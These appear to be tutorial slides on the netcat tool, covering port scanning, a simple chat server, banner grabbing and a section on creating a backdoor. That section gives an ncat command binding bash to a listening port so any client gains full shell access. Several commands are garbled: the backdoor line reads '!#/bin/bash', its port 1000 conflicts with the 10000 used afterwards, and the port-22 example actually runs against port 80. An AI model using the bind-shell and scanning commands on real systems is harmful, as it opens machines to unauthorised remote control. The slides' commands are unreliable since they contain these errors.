Netcat

Netcat
• Netcat (or nc in short) is a simple yet powerful networking command-
line tool used for performing any operation in Linux related to TCP,
UDP, or UNIX-domain sockets.

• Netcat can be used for port scanning, port redirection, as a port

listener (for incoming connections); it can also be used to open
remote connections and so many other things. Besides, you can use it
as a backdoor to gain access to a target server.
Port Scanning
Netcat can be used for port scanning: to know which ports are open and running
services on a target machine. It can scan a single or multiple or a range of open ports.
Here is an example, the -z option sets nc to simply scan for listening daemons,
without actually sending any data to them. The -v option enables verbose mode and -
w specifies a timeout for connection that can not be established.

$ nc -v -w 2 -z 192.168.56.1 22 #scan a single port

OR
$ nc -v -w 2 -z 192.168.56.1 22 80 #scan multiple ports
OR
$ nc -v -w 2 -z 192.168.56.1 20-25 #scan range of ports
Create a Command Line Chat Server
You can also use Netcat to create a simple command-line messaging server instantly. As
in the previous usage example, nc must be installed on both systems used for the chat
room.
On one system, run the following command to create the chat server listening on port
5000.

$ nc -l -vv -p 5000

On the other system, run the following command to launch a chat session to a machine
where the messaging server is running.

$ nc 192.168.56.1 5000
Find a Service Running on Port

You can also use Netcat to obtain port banners. In this case, it will tell
you what service is running behind a certain port. For example to know
what type of service is running behind port 22 on a specific server, run
the following command (replace 192.168.56.110 with the target
server’s IP address). The -n flag means to disable DNS or service
lookups.

$ nc -v -n 192.168.56.110 80
Create a Backdoor via nc
NC command can also be used to create backdoor to your systems and
and this technique is actually used by hackers a lot. To create a
backdoor, the command is,

$ ncat -l 1000 -e !#/bin/bash. "e" flag attaches a bash to port 10000.

Now a client can connect to port 10000 on server and will have
complete access to our system via bash.

$ncat 192.168.1.100 10000